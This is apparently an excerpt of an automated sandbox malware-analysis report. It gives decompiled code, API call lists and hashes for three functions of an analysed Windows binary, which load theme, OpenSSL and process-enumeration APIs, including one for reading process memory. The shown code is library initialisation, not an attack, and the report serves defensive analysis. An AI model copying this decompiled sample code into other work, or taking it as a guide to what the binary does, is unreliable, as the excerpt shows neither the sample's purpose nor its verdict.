				E0042E1AC(_t2);
				_push(_t111);
				_push(0x42e767);
				_push( *[fs:eax]);
				 *[fs:eax] = _t111;
				 *0x49ea44 =  *0x49ea44 + 1;
				if( *0x49ea40 == 0) {
					 *0x49ea40 = LoadLibraryA("uxtheme.dll");
					if( *0x49ea40 > 0) {
						 *0x49e980 = GetProcAddress( *0x49ea40, "OpenThemeData");
						 *0x49e984 = GetProcAddress( *0x49ea40, "CloseThemeData");
						 *0x49e988 = GetProcAddress( *0x49ea40, "DrawThemeBackground");
						 *0x49e98c = GetProcAddress( *0x49ea40, "DrawThemeText");
						 *0x49e990 = GetProcAddress( *0x49ea40, "GetThemeBackgroundContentRect");
						 *0x49e994 = GetProcAddress( *0x49ea40, "GetThemeBackgroundContentRect");
						 *0x49e998 = GetProcAddress( *0x49ea40, "GetThemePartSize");
						 *0x49e99c = GetProcAddress( *0x49ea40, "GetThemeTextExtent");
						 *0x49e9a0 = GetProcAddress( *0x49ea40, "GetThemeTextMetrics");
						 *0x49e9a4 = GetProcAddress( *0x49ea40, "GetThemeBackgroundRegion");
						 *0x49e9a8 = GetProcAddress( *0x49ea40, "HitTestThemeBackground");
						 *0x49e9ac = GetProcAddress( *0x49ea40, "DrawThemeEdge");
						 *0x49e9b0 = GetProcAddress( *0x49ea40, "DrawThemeIcon");
						 *0x49e9b4 = GetProcAddress( *0x49ea40, "IsThemePartDefined");
						 *0x49e9b8 = GetProcAddress( *0x49ea40, "IsThemeBackgroundPartiallyTransparent");
						 *0x49e9bc = GetProcAddress( *0x49ea40, "GetThemeColor");
						 *0x49e9c0 = GetProcAddress( *0x49ea40, "GetThemeMetric");
						 *0x49e9c4 = GetProcAddress( *0x49ea40, "GetThemeString");
						 *0x49e9c8 = GetProcAddress( *0x49ea40, "GetThemeBool");
						 *0x49e9cc = GetProcAddress( *0x49ea40, "GetThemeInt");
						 *0x49e9d0 = GetProcAddress( *0x49ea40, "GetThemeEnumValue");
						 *0x49e9d4 = GetProcAddress( *0x49ea40, "GetThemePosition");
						 *0x49e9d8 = GetProcAddress( *0x49ea40, "GetThemeFont");
						 *0x49e9dc = GetProcAddress( *0x49ea40, "GetThemeRect");
						 *0x49e9e0 = GetProcAddress( *0x49ea40, "GetThemeMargins");
						 *0x49e9e4 = GetProcAddress( *0x49ea40, "GetThemeIntList");
						 *0x49e9e8 = GetProcAddress( *0x49ea40, "GetThemePropertyOrigin");
						 *0x49e9ec = GetProcAddress( *0x49ea40, "SetWindowTheme");
						 *0x49e9f0 = GetProcAddress( *0x49ea40, "GetThemeFilename");
						 *0x49e9f4 = GetProcAddress( *0x49ea40, "GetThemeSysColor");
						 *0x49e9f8 = GetProcAddress( *0x49ea40, "GetThemeSysColorBrush");
						 *0x49e9fc = GetProcAddress( *0x49ea40, "GetThemeSysBool");
						 *0x49ea00 = GetProcAddress( *0x49ea40, "GetThemeSysSize");
						 *0x49ea04 = GetProcAddress( *0x49ea40, "GetThemeSysFont");
						 *0x49ea08 = GetProcAddress( *0x49ea40, "GetThemeSysString");
						 *0x49ea0c = GetProcAddress( *0x49ea40, "GetThemeSysInt");
						 *0x49ea10 = GetProcAddress( *0x49ea40, "IsThemeActive");
						 *0x49ea14 = GetProcAddress( *0x49ea40, "IsAppThemed");
						 *0x49ea18 = GetProcAddress( *0x49ea40, "GetWindowTheme");
						 *0x49ea1c = GetProcAddress( *0x49ea40, "EnableThemeDialogTexture");
						 *0x49ea20 = GetProcAddress( *0x49ea40, "IsThemeDialogTextureEnabled");
						 *0x49ea24 = GetProcAddress( *0x49ea40, "GetThemeAppProperties");
						 *0x49ea28 = GetProcAddress( *0x49ea40, "SetThemeAppProperties");
						 *0x49ea2c = GetProcAddress( *0x49ea40, "GetCurrentThemeName");
						 *0x49ea30 = GetProcAddress( *0x49ea40, "GetThemeDocumentationProperty");
						 *0x49ea34 = GetProcAddress( *0x49ea40, "DrawThemeParentBackground");
						 *0x49ea38 = GetProcAddress( *0x49ea40, "EnableTheming");
					}
				}
				_v5 =  *0x49ea40 > 0;
				_pop(_t108);
				 *[fs:eax] = _t108;
				_push(0x42e76e);
				_t6 =  *0x49ea48; // 0x22f0dc8
				return E0042E1B4(_t6);
			}








                                                    0x0042e3be
                                                    0x0042e3c3
                                                    0x0042e3ca
                                                    0x0042e3cb
                                                    0x0042e3d0
                                                    0x0042e3d3
                                                    0x0042e3d6
                                                    0x0042e3df
                                                    0x0042e3ef
                                                    0x0042e3f4
                                                    0x0042e407
                                                    0x0042e419
                                                    0x0042e42b
                                                    0x0042e43d
                                                    0x0042e44f
                                                    0x0042e461
                                                    0x0042e473
                                                    0x0042e485
                                                    0x0042e497
                                                    0x0042e4a9
                                                    0x0042e4bb
                                                    0x0042e4cd
                                                    0x0042e4df
                                                    0x0042e4f1
                                                    0x0042e503
                                                    0x0042e515
                                                    0x0042e527
                                                    0x0042e539
                                                    0x0042e54b
                                                    0x0042e55d
                                                    0x0042e56f
                                                    0x0042e581
                                                    0x0042e593
                                                    0x0042e5a5
                                                    0x0042e5b7
                                                    0x0042e5c9
                                                    0x0042e5db
                                                    0x0042e5ed
                                                    0x0042e5ff
                                                    0x0042e611
                                                    0x0042e623
                                                    0x0042e635
                                                    0x0042e647
                                                    0x0042e659
                                                    0x0042e66b
                                                    0x0042e67d
                                                    0x0042e68f
                                                    0x0042e6a1
                                                    0x0042e6b3
                                                    0x0042e6c5
                                                    0x0042e6d7
                                                    0x0042e6e9
                                                    0x0042e6fb
                                                    0x0042e70d
                                                    0x0042e71f
                                                    0x0042e731
                                                    0x0042e743
                                                    0x0042e743
                                                    0x0042e3f4
                                                    0x0042e74b
                                                    0x0042e751
                                                    0x0042e754
                                                    0x0042e757
                                                    0x0042e75c
                                                    0x0042e766

                                                    APIs
                                                    • LoadLibraryA.KERNEL32(uxtheme.dll,00000000,0042E767), ref: 0042E3EA
                                                    • GetProcAddress.KERNEL32(00000000,OpenThemeData), ref: 0042E402
                                                    • GetProcAddress.KERNEL32(00000000,CloseThemeData), ref: 0042E414
                                                    • GetProcAddress.KERNEL32(00000000,DrawThemeBackground), ref: 0042E426
                                                    • GetProcAddress.KERNEL32(00000000,DrawThemeText), ref: 0042E438
                                                    • GetProcAddress.KERNEL32(00000000,GetThemeBackgroundContentRect), ref: 0042E44A
                                                    • GetProcAddress.KERNEL32(00000000,GetThemeBackgroundContentRect), ref: 0042E45C
                                                    • GetProcAddress.KERNEL32(00000000,GetThemePartSize), ref: 0042E46E
                                                    • GetProcAddress.KERNEL32(00000000,GetThemeTextExtent), ref: 0042E480
                                                    • GetProcAddress.KERNEL32(00000000,GetThemeTextMetrics), ref: 0042E492
                                                    • GetProcAddress.KERNEL32(00000000,GetThemeBackgroundRegion), ref: 0042E4A4
                                                    • GetProcAddress.KERNEL32(00000000,HitTestThemeBackground), ref: 0042E4B6
                                                    • GetProcAddress.KERNEL32(00000000,DrawThemeEdge), ref: 0042E4C8
                                                    • GetProcAddress.KERNEL32(00000000,DrawThemeIcon), ref: 0042E4DA
                                                    • GetProcAddress.KERNEL32(00000000,IsThemePartDefined), ref: 0042E4EC
                                                    • GetProcAddress.KERNEL32(00000000,IsThemeBackgroundPartiallyTransparent), ref: 0042E4FE
                                                    • GetProcAddress.KERNEL32(00000000,GetThemeColor), ref: 0042E510
                                                    • GetProcAddress.KERNEL32(00000000,GetThemeMetric), ref: 0042E522
                                                    • GetProcAddress.KERNEL32(00000000,GetThemeString), ref: 0042E534
                                                    • GetProcAddress.KERNEL32(00000000,GetThemeBool), ref: 0042E546
                                                    • GetProcAddress.KERNEL32(00000000,GetThemeInt), ref: 0042E558
                                                    • GetProcAddress.KERNEL32(00000000,GetThemeEnumValue), ref: 0042E56A
                                                    • GetProcAddress.KERNEL32(00000000,GetThemePosition), ref: 0042E57C
                                                    • GetProcAddress.KERNEL32(00000000,GetThemeFont), ref: 0042E58E
                                                    • GetProcAddress.KERNEL32(00000000,GetThemeRect), ref: 0042E5A0
                                                    • GetProcAddress.KERNEL32(00000000,GetThemeMargins), ref: 0042E5B2
                                                    • GetProcAddress.KERNEL32(00000000,GetThemeIntList), ref: 0042E5C4
                                                    • GetProcAddress.KERNEL32(00000000,GetThemePropertyOrigin), ref: 0042E5D6
                                                    • GetProcAddress.KERNEL32(00000000,SetWindowTheme), ref: 0042E5E8
                                                    • GetProcAddress.KERNEL32(00000000,GetThemeFilename), ref: 0042E5FA
                                                    • GetProcAddress.KERNEL32(00000000,GetThemeSysColor), ref: 0042E60C
                                                    • GetProcAddress.KERNEL32(00000000,GetThemeSysColorBrush), ref: 0042E61E
                                                    • GetProcAddress.KERNEL32(00000000,GetThemeSysBool), ref: 0042E630
                                                    • GetProcAddress.KERNEL32(00000000,GetThemeSysSize), ref: 0042E642
                                                    • GetProcAddress.KERNEL32(00000000,GetThemeSysFont), ref: 0042E654
                                                    • GetProcAddress.KERNEL32(00000000,GetThemeSysString), ref: 0042E666
                                                    • GetProcAddress.KERNEL32(00000000,GetThemeSysInt), ref: 0042E678
                                                    • GetProcAddress.KERNEL32(00000000,IsThemeActive), ref: 0042E68A
                                                    • GetProcAddress.KERNEL32(00000000,IsAppThemed), ref: 0042E69C
                                                    • GetProcAddress.KERNEL32(00000000,GetWindowTheme), ref: 0042E6AE
                                                    • GetProcAddress.KERNEL32(00000000,EnableThemeDialogTexture), ref: 0042E6C0
                                                    • GetProcAddress.KERNEL32(00000000,IsThemeDialogTextureEnabled), ref: 0042E6D2
                                                    • GetProcAddress.KERNEL32(00000000,GetThemeAppProperties), ref: 0042E6E4
                                                    • GetProcAddress.KERNEL32(00000000,SetThemeAppProperties), ref: 0042E6F6
                                                    • GetProcAddress.KERNEL32(00000000,GetCurrentThemeName), ref: 0042E708
                                                    • GetProcAddress.KERNEL32(00000000,GetThemeDocumentationProperty), ref: 0042E71A
                                                    • GetProcAddress.KERNEL32(00000000,DrawThemeParentBackground), ref: 0042E72C
                                                    • GetProcAddress.KERNEL32(00000000,EnableTheming), ref: 0042E73E
                                                    Strings
                                                    Memory Dump Source
                                                    • Source File: 00000009.00000002.337852872.0000000000401000.00000020.00000001.01000000.00000008.sdmp, Offset: 00400000, based on PE: true
                                                    • Associated: 00000009.00000002.337842077.0000000000400000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                    • Associated: 00000009.00000002.337959100.000000000049B000.00000004.00000001.01000000.00000008.sdmpDownload File
                                                    • Associated: 00000009.00000002.337978553.00000000004A5000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_9_2_400000_WINDOWS.jbxd
                                                    Yara matches
                                                    Similarity
                                                    • API ID: AddressProc$LibraryLoad
                                                    • String ID: CloseThemeData$DrawThemeBackground$DrawThemeEdge$DrawThemeIcon$DrawThemeParentBackground$DrawThemeText$EnableThemeDialogTexture$EnableTheming$GetCurrentThemeName$GetThemeAppProperties$GetThemeBackgroundContentRect$GetThemeBackgroundRegion$GetThemeBool$GetThemeColor$GetThemeDocumentationProperty$GetThemeEnumValue$GetThemeFilename$GetThemeFont$GetThemeInt$GetThemeIntList$GetThemeMargins$GetThemeMetric$GetThemePartSize$GetThemePosition$GetThemePropertyOrigin$GetThemeRect$GetThemeString$GetThemeSysBool$GetThemeSysColor$GetThemeSysColorBrush$GetThemeSysFont$GetThemeSysInt$GetThemeSysSize$GetThemeSysString$GetThemeTextExtent$GetThemeTextMetrics$GetWindowTheme$HitTestThemeBackground$IsAppThemed$IsThemeActive$IsThemeBackgroundPartiallyTransparent$IsThemeDialogTextureEnabled$IsThemePartDefined$OpenThemeData$SetThemeAppProperties$SetWindowTheme$uxtheme.dll
                                                    • API String ID: 2238633743-2910565190
                                                    • Opcode ID: ee8c2f2005abb4408c06f873b3dfebe79f53f1c338d80728f9456e011397e4d0
                                                    • Instruction ID: 583b1748ec7c75dcc55376f1719c3b0464f23e6b29e7b95583f9f44409200d59
                                                    • Opcode Fuzzy Hash: ee8c2f2005abb4408c06f873b3dfebe79f53f1c338d80728f9456e011397e4d0
                                                    • Instruction Fuzzy Hash: 08A1F2B0F48660AFDB00EB67EC96B2637A8EB15704350467BB400DF696D67DA8009B5E
                                                    Uniqueness

                                                    Uniqueness Score: -1.00%

                                                    Function 004906B8 Relevance: 142.1, APIs: 2, Strings: 79, Instructions: 395libraryCOMMON
                                                    Download Yara Rule
                                                    C-Code - Quality: 100%
                                                    			E004906B8() {
				void* __ebx;
				void* _t158;

				_t158 = 1;
				if( *0x49d588 == 0) {
					 *0x49d588 = LoadLibraryA("libeay32.dll");
				}
				_t160 =  *0x49d584;
				if( *0x49d584 == 0) {
					 *0x49d584 = LoadLibraryA("ssleay32.dll");
					 *0x49d454 = E0049058C("SSL_CTX_set_cipher_list", _t158);
					 *0x49d458 = E0049058C("SSL_CTX_new", _t158);
					 *0x49d45c = E0049058C("SSL_CTX_free", _t158);
					 *0x49d460 = E0049058C("SSL_set_fd", _t158);
					 *0x49d464 = E0049058C("SSL_CTX_use_PrivateKey_file", _t158);
					 *0x49d468 = E0049058C("SSL_CTX_use_certificate_file", _t158);
					 *0x49d46c = E0049058C("SSL_load_error_strings", _t158);
					 *0x49d470 = E0049058C("SSL_state_string_long", _t158);
					 *0x49d474 = E0049058C("SSL_get_peer_certificate", _t158);
					 *0x49d478 = E0049058C("SSL_CTX_set_verify", _t158);
					 *0x49d47c = E0049058C("SSL_CTX_set_verify_depth", _t158);
					 *0x49d480 = E0049058C("SSL_CTX_get_verify_depth", _t158);
					 *0x49d484 = E0049058C("SSL_CTX_set_default_passwd_cb", _t158);
					 *0x49d488 = E0049058C("SSL_CTX_set_default_passwd_cb_userdata", _t158);
					 *0x49d48c = E0049058C("SSL_CTX_check_private_key", _t158);
					 *0x49d490 = E0049058C("SSL_new", _t158);
					 *0x49d494 = E0049058C("SSL_free", _t158);
					 *0x49d498 = E0049058C("SSL_accept", _t158);
					 *0x49d49c = E0049058C("SSL_connect", _t158);
					 *0x49d4a0 = E0049058C("SSL_read", _t158);
					 *0x49d4a4 = E0049058C("SSL_peek", _t158);
					 *0x49d4a8 = E0049058C("SSL_write", _t158);
					 *0x49d4ac = E0049058C("SSL_get_error", _t158);
					 *0x49d4b0 = E0049058C("SSLv2_method", _t158);
					 *0x49d4b4 = E0049058C("SSLv2_server_method", _t158);
					 *0x49d4b8 = E0049058C("SSLv2_client_method", _t158);
					 *0x49d4bc = E0049058C("SSLv3_method", _t158);
					 *0x49d4c0 = E0049058C("SSLv3_server_method", _t158);
					 *0x49d4c4 = E0049058C("SSLv3_client_method", _t158);
					 *0x49d4c8 = E0049058C("SSLv23_method", _t158);
					 *0x49d4cc = E0049058C("SSLv23_server_method", _t158);
					 *0x49d4d0 = E0049058C("SSLv23_client_method", _t158);
					 *0x49d4d4 = E0049058C("TLSv1_method", _t158);
					 *0x49d4d8 = E0049058C("TLSv1_server_method", _t158);
					 *0x49d4dc = E0049058C("TLSv1_client_method", _t158);
					 *0x49d4e0 = E0049058C("SSL_shutdown", _t158);
					 *0x49d4e4 = E0049058C("SSL_set_connect_state", _t158);
					 *0x49d4e8 = E0049058C("SSL_set_accept_state", _t158);
					 *0x49d4ec = E0049058C("SSL_set_shutdown", _t158);
					 *0x49d4f0 = E0049058C("SSL_CTX_load_verify_locations", _t158);
					 *0x49d4f4 = E0049058C("SSL_get_session", _t158);
					 *0x49d4f8 = E0049058C("SSL_library_init", _t158);
					 *0x49d4fc = E004905FC("SSL_CTX_set_info_callback_indy", _t158, _t160);
					 *0x49d500 = E004905FC("X509_STORE_CTX_get_app_data_indy", _t158, _t160);
					 *0x49d504 = E004905FC("SSL_SESSION_get_id_indy", _t158, _t160);
					 *0x49d508 = E004905FC("SSL_SESSION_get_id_ctx_indy", _t158, _t160);
					 *0x49d50c = E004905FC("SSL_CTX_get_version_indy", _t158, _t160);
					 *0x49d510 = E004905FC("SSL_CTX_set_options_indy", _t158, _t160);
					 *0x49d514 = E00490648("X509_NAME_oneline", _t158);
					 *0x49d518 = E0049058C("X509_NAME_hash", _t158);
					 *0x49d51c = E00490648("X509_set_issuer_name", _t158);
					 *0x49d520 = E00490648("X509_get_issuer_name", _t158);
					 *0x49d524 = E00490648("X509_set_subject_name", _t158);
					 *0x49d528 = E00490648("X509_get_subject_name", _t158);
					 *0x49d52c = E0049058C("X509_digest", _t158);
					 *0x49d530 = E0049058C("EVP_md5", _t158);
					 *0x49d534 = E004905FC("X509_get_notBefore_indy", _t158, _t160);
					 *0x49d538 = E004905FC("X509_get_notAfter_indy", _t158, _t160);
					 *0x49d53c = E00490648("X509_STORE_CTX_get_error", _t158);
					 *0x49d540 = E00490648("X509_STORE_CTX_set_error", _t158);
					 *0x49d544 = E00490648("X509_STORE_CTX_get_error_depth", _t158);
					 *0x49d548 = E00490648("X509_STORE_CTX_get_current_cert", _t158);
					 *0x49d590 = E00490648("RAND_screen", _t158);
					 *0x49d54c = E00490648("des_set_odd_parity", _t158);
					 *0x49d550 = E00490648("des_set_key", _t158);
					 *0x49d554 = E00490648("des_ecb_encrypt", _t158);
					 *0x49d558 = E0049058C("SSL_set_ex_data", _t158);
					 *0x49d55c = E0049058C("SSL_get_ex_data", _t158);
					 *0x49d560 = E0049058C("SSL_load_client_CA_file", _t158);
					 *0x49d564 = E0049058C("SSL_CTX_set_client_CA_list", _t158);
					 *0x49d568 = E0049058C("SSL_CTX_set_default_verify_paths", _t158);
					 *0x49d56c = E0049058C("SSL_CTX_set_session_id_context", _t158);
					 *0x49d570 = E0049058C("SSL_CIPHER_description", _t158);
					 *0x49d574 = E0049058C("SSL_get_current_cipher", _t158);
					 *0x49d578 = E0049058C("SSL_CIPHER_get_name", _t158);
					 *0x49d57c = E0049058C("SSL_CIPHER_get_version", _t158);
					 *0x49d580 = E0049058C("SSL_CIPHER_get_bits", _t158);
					if( *0x49d454 == 0 ||  *0x49d458 == 0 ||  *0x49d45c == 0 ||  *0x49d460 == 0 ||  *0x49d464 == 0 ||  *0x49d468 == 0 ||  *0x49d46c == 0 ||  *0x49d470 == 0 ||  *0x49d474 == 0 ||  *0x49d478 == 0 ||  *0x49d484 == 0 ||  *0x49d488 == 0 ||  *0x49d48c == 0 ||  *0x49d490 == 0 ||  *0x49d494 == 0 ||  *0x49d498 == 0 ||  *0x49d49c == 0 ||  *0x49d4a0 == 0 ||  *0x49d4a4 == 0 ||  *0x49d4a8 == 0 ||  *0x49d4ac == 0 ||  *0x49d4b0 == 0 ||  *0x49d4b4 == 0 ||  *0x49d4b8 == 0 ||  *0x49d4bc == 0 ||  *0x49d4c0 == 0 ||  *0x49d4c4 == 0 ||  *0x49d4c8 == 0 ||  *0x49d4cc == 0 ||  *0x49d4d0 == 0 ||  *0x49d4d4 == 0 ||  *0x49d4d8 == 0 ||  *0x49d4dc == 0 ||  *0x49d4e0 == 0 ||  *0x49d4e4 == 0 ||  *0x49d4e8 == 0 ||  *0x49d4ec == 0 ||  *0x49d4f0 == 0 ||  *0x49d4f4 == 0 ||  *0x49d4f8 == 0 ||  *0x49d4fc == 0 ||  *0x49d500 == 0 ||  *0x49d504 == 0 ||  *0x49d508 == 0 ||  *0x49d50c == 0 ||  *0x49d510 == 0 ||  *0x49d514 == 0 ||  *0x49d51c == 0 ||  *0x49d520 == 0 ||  *0x49d524 == 0 ||  *0x49d528 == 0 ||  *0x49d534 == 0 ||  *0x49d538 == 0 ||  *0x49d53c == 0 ||  *0x49d540 == 0 ||  *0x49d544 == 0 ||  *0x49d548 == 0 ||  *0x49d54c == 0 ||  *0x49d550 == 0 ||  *0x49d554 == 0 ||  *0x49d558 == 0 ||  *0x49d55c == 0 ||  *0x49d47c == 0 ||  *0x49d480 == 0 ||  *0x49d560 == 0 ||  *0x49d564 == 0 ||  *0x49d568 == 0 ||  *0x49d56c == 0 ||  *0x49d570 == 0 ||  *0x49d574 == 0 ||  *0x49d578 == 0 ||  *0x49d580 == 0 ||  *0x49d57c == 0) {
						_t158 = 0;
					} else {
						_t158 = 1;
					}
				}
				return _t158;
			}





                                                    0x004906b9
                                                    0x004906c2
                                                    0x004906ce
                                                    0x004906ce
                                                    0x004906d3
                                                    0x004906da
                                                    0x004906ea
                                                    0x004906f9
                                                    0x00490708
                                                    0x00490717
                                                    0x00490726
                                                    0x00490735
                                                    0x00490744
                                                    0x00490753
                                                    0x00490762
                                                    0x00490771
                                                    0x00490780
                                                    0x0049078f
                                                    0x0049079e
                                                    0x004907ad
                                                    0x004907bc
                                                    0x004907cb
                                                    0x004907da
                                                    0x004907e9
                                                    0x004907f8
                                                    0x00490807
                                                    0x00490816
                                                    0x00490825
                                                    0x00490834
                                                    0x00490843
                                                    0x00490852
                                                    0x00490861
                                                    0x00490870
                                                    0x0049087f
                                                    0x0049088e
                                                    0x0049089d
                                                    0x004908ac
                                                    0x004908bb
                                                    0x004908ca
                                                    0x004908d9
                                                    0x004908e8
                                                    0x004908f7
                                                    0x00490906
                                                    0x00490915
                                                    0x00490924
                                                    0x00490933
                                                    0x00490942
                                                    0x00490951
                                                    0x00490960
                                                    0x0049096f
                                                    0x0049097e
                                                    0x0049098d
                                                    0x0049099c
                                                    0x004909ab
                                                    0x004909ba
                                                    0x004909c9
                                                    0x004909d8
                                                    0x004909e7
                                                    0x004909f6
                                                    0x00490a05
                                                    0x00490a14
                                                    0x00490a23
                                                    0x00490a32
                                                    0x00490a41
                                                    0x00490a50
                                                    0x00490a5f
                                                    0x00490a6e
                                                    0x00490a7d
                                                    0x00490a8c
                                                    0x00490a9b
                                                    0x00490aaa
                                                    0x00490ab9
                                                    0x00490ac8
                                                    0x00490ad7
                                                    0x00490ae6
                                                    0x00490af5
                                                    0x00490b04
                                                    0x00490b13
                                                    0x00490b22
                                                    0x00490b31
                                                    0x00490b40
                                                    0x00490b4f
                                                    0x00490b5e
                                                    0x00490b6d
                                                    0x00490b79
                                                    0x00490eeb
                                                    0x00490eef
                                                    0x00490eef
                                                    0x00490eef
                                                    0x00490b79
                                                    0x00490ef4

                                                    APIs
                                                    • LoadLibraryA.KERNEL32(libeay32.dll,00000001,00492B1E,00000001,004933E4,00000000,00493438,?,?,?,00000000,?,00493208,?,?,004930CF), ref: 004906C9
                                                      • Part of subcall function 0049058C: GetProcAddress.KERNEL32(00000000,00000000), ref: 004905C6
                                                      • Part of subcall function 00490648: GetProcAddress.KERNEL32(00000000,00000000), ref: 00490682
                                                    • LoadLibraryA.KERNEL32(ssleay32.dll,00000001,00492B1E,00000001,004933E4,00000000,00493438,?,?,?,00000000,?,00493208,?,?,004930CF), ref: 004906E5
                                                    Strings
                                                    Memory Dump Source
                                                    • Source File: 00000009.00000002.337852872.0000000000401000.00000020.00000001.01000000.00000008.sdmp, Offset: 00400000, based on PE: true
                                                    • Associated: 00000009.00000002.337842077.0000000000400000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                    • Associated: 00000009.00000002.337959100.000000000049B000.00000004.00000001.01000000.00000008.sdmpDownload File
                                                    • Associated: 00000009.00000002.337978553.00000000004A5000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_9_2_400000_WINDOWS.jbxd
                                                    Yara matches
                                                    Similarity
                                                    • API ID: AddressLibraryLoadProc
                                                    • String ID: EVP_md5$RAND_screen$SSL_CIPHER_description$SSL_CIPHER_get_bits$SSL_CIPHER_get_name$SSL_CIPHER_get_version$SSL_CTX_check_private_key$SSL_CTX_free$SSL_CTX_get_verify_depth$SSL_CTX_get_version_indy$SSL_CTX_load_verify_locations$SSL_CTX_new$SSL_CTX_set_cipher_list$SSL_CTX_set_client_CA_list$SSL_CTX_set_default_passwd_cb$SSL_CTX_set_default_passwd_cb_userdata$SSL_CTX_set_default_verify_paths$SSL_CTX_set_info_callback_indy$SSL_CTX_set_options_indy$SSL_CTX_set_session_id_context$SSL_CTX_set_verify$SSL_CTX_set_verify_depth$SSL_CTX_use_PrivateKey_file$SSL_CTX_use_certificate_file$SSL_SESSION_get_id_ctx_indy$SSL_SESSION_get_id_indy$SSL_accept$SSL_connect$SSL_free$SSL_get_current_cipher$SSL_get_error$SSL_get_ex_data$SSL_get_peer_certificate$SSL_get_session$SSL_library_init$SSL_load_client_CA_file$SSL_load_error_strings$SSL_new$SSL_peek$SSL_read$SSL_set_accept_state$SSL_set_connect_state$SSL_set_ex_data$SSL_set_fd$SSL_set_shutdown$SSL_shutdown$SSL_state_string_long$SSL_write$SSLv23_client_method$SSLv23_method$SSLv23_server_method$SSLv2_client_method$SSLv2_method$SSLv2_server_method$SSLv3_client_method$SSLv3_method$SSLv3_server_method$TLSv1_client_method$TLSv1_method$TLSv1_server_method$X509_NAME_hash$X509_NAME_oneline$X509_STORE_CTX_get_app_data_indy$X509_STORE_CTX_get_current_cert$X509_STORE_CTX_get_error$X509_STORE_CTX_get_error_depth$X509_STORE_CTX_set_error$X509_digest$X509_get_issuer_name$X509_get_notAfter_indy$X509_get_notBefore_indy$X509_get_subject_name$X509_set_issuer_name$X509_set_subject_name$des_ecb_encrypt$des_set_key$des_set_odd_parity$libeay32.dll$ssleay32.dll
                                                    • API String ID: 2574300362-3914122982
                                                    • Opcode ID: 4fe4e2f35140f34da03946c322c5fb95e3d1eee53cfea54a21f1e7ca64066c46
                                                    • Instruction ID: 3fc9e01923c26730d663d19a2b901ff2da1ed37202cb3e817e08d019f5698bc5
                                                    • Opcode Fuzzy Hash: 4fe4e2f35140f34da03946c322c5fb95e3d1eee53cfea54a21f1e7ca64066c46
                                                    • Instruction Fuzzy Hash: 9202C874D00205AEDF75EB6DA90935A3EA1E76432DF06443BA908C72B1D77C9884CF9E
                                                    Uniqueness

                                                    Uniqueness Score: -1.00%

                                                    Function 004728A4 Relevance: 59.6, APIs: 17, Strings: 17, Instructions: 99libraryloaderCOMMON
                                                    Download Yara Rule
                                                    C-Code - Quality: 100%
                                                    			E004728A4() {

				if( *0x49ebf4 == 0) {
					 *0x49ebf4 = GetModuleHandleA("kernel32.dll");
					if( *0x49ebf4 != 0) {
						 *0x49ebf8 = GetProcAddress( *0x49ebf4, "CreateToolhelp32Snapshot");
						 *0x49ebfc = GetProcAddress( *0x49ebf4, "Heap32ListFirst");
						 *0x49ec00 = GetProcAddress( *0x49ebf4, "Heap32ListNext");
						 *0x49ec04 = GetProcAddress( *0x49ebf4, "Heap32First");
						 *0x49ec08 = GetProcAddress( *0x49ebf4, "Heap32Next");
						 *0x49ec0c = GetProcAddress( *0x49ebf4, "Toolhelp32ReadProcessMemory");
						 *0x49ec10 = GetProcAddress( *0x49ebf4, "Process32First");
						 *0x49ec14 = GetProcAddress( *0x49ebf4, "Process32Next");
						 *0x49ec18 = GetProcAddress( *0x49ebf4, "Process32FirstW");
						 *0x49ec1c = GetProcAddress( *0x49ebf4, "Process32NextW");
						 *0x49ec20 = GetProcAddress( *0x49ebf4, "Thread32First");
						 *0x49ec24 = GetProcAddress( *0x49ebf4, "Thread32Next");
						 *0x49ec28 = GetProcAddress( *0x49ebf4, "Module32First");
						 *0x49ec2c = GetProcAddress( *0x49ebf4, "Module32Next");
						 *0x49ec30 = GetProcAddress( *0x49ebf4, "Module32FirstW");
						 *0x49ec34 = GetProcAddress( *0x49ebf4, "Module32NextW");
					}
				}
				if( *0x49ebf4 == 0 ||  *0x49ebf8 == 0) {
					return 0;
				} else {
					return 1;
				}
			}



                                                    0x004728ad
                                                    0x004728bd
                                                    0x004728c2
                                                    0x004728d5
                                                    0x004728e7
                                                    0x004728f9
                                                    0x0047290b
                                                    0x0047291d
                                                    0x0047292f
                                                    0x00472941
                                                    0x00472953
                                                    0x00472965
                                                    0x00472977
                                                    0x00472989
                                                    0x0047299b
                                                    0x004729ad
                                                    0x004729bf
                                                    0x004729d1
                                                    0x004729e3
                                                    0x004729e3
                                                    0x004728c2
                                                    0x004729eb
                                                    0x004729f9
                                                    0x004729fa
                                                    0x004729fd
                                                    0x004729fd

                                                    APIs
                                                    • GetModuleHandleA.KERNEL32(kernel32.dll,00000002,00472B2B,?,?,00475AEA,00000000,00475BD5), ref: 004728B8
                                                    • GetProcAddress.KERNEL32(00000000,CreateToolhelp32Snapshot), ref: 004728D0
                                                    • GetProcAddress.KERNEL32(00000000,Heap32ListFirst), ref: 004728E2
                                                    • GetProcAddress.KERNEL32(00000000,Heap32ListNext), ref: 004728F4
                                                    • GetProcAddress.KERNEL32(00000000,Heap32First), ref: 00472906
                                                    • GetProcAddress.KERNEL32(00000000,Heap32Next), ref: 00472918
                                                    • GetProcAddress.KERNEL32(00000000,Toolhelp32ReadProcessMemory), ref: 0047292A
                                                    • GetProcAddress.KERNEL32(00000000,Process32First), ref: 0047293C
                                                    • GetProcAddress.KERNEL32(00000000,Process32Next), ref: 0047294E
                                                    • GetProcAddress.KERNEL32(00000000,Process32FirstW), ref: 00472960
                                                    • GetProcAddress.KERNEL32(00000000,Process32NextW), ref: 00472972
                                                    • GetProcAddress.KERNEL32(00000000,Thread32First), ref: 00472984
                                                    • GetProcAddress.KERNEL32(00000000,Thread32Next), ref: 00472996
                                                    • GetProcAddress.KERNEL32(00000000,Module32First), ref: 004729A8
                                                    • GetProcAddress.KERNEL32(00000000,Module32Next), ref: 004729BA
                                                    • GetProcAddress.KERNEL32(00000000,Module32FirstW), ref: 004729CC
                                                    • GetProcAddress.KERNEL32(00000000,Module32NextW), ref: 004729DE
                                                    Strings
                                                    Memory Dump Source
                                                    • Source File: 00000009.00000002.337852872.0000000000401000.00000020.00000001.01000000.00000008.sdmp, Offset: 00400000, based on PE: true
                                                    • Associated: 00000009.00000002.337842077.0000000000400000.00000002.00000001.01000000.00000008.sdmpDownload File
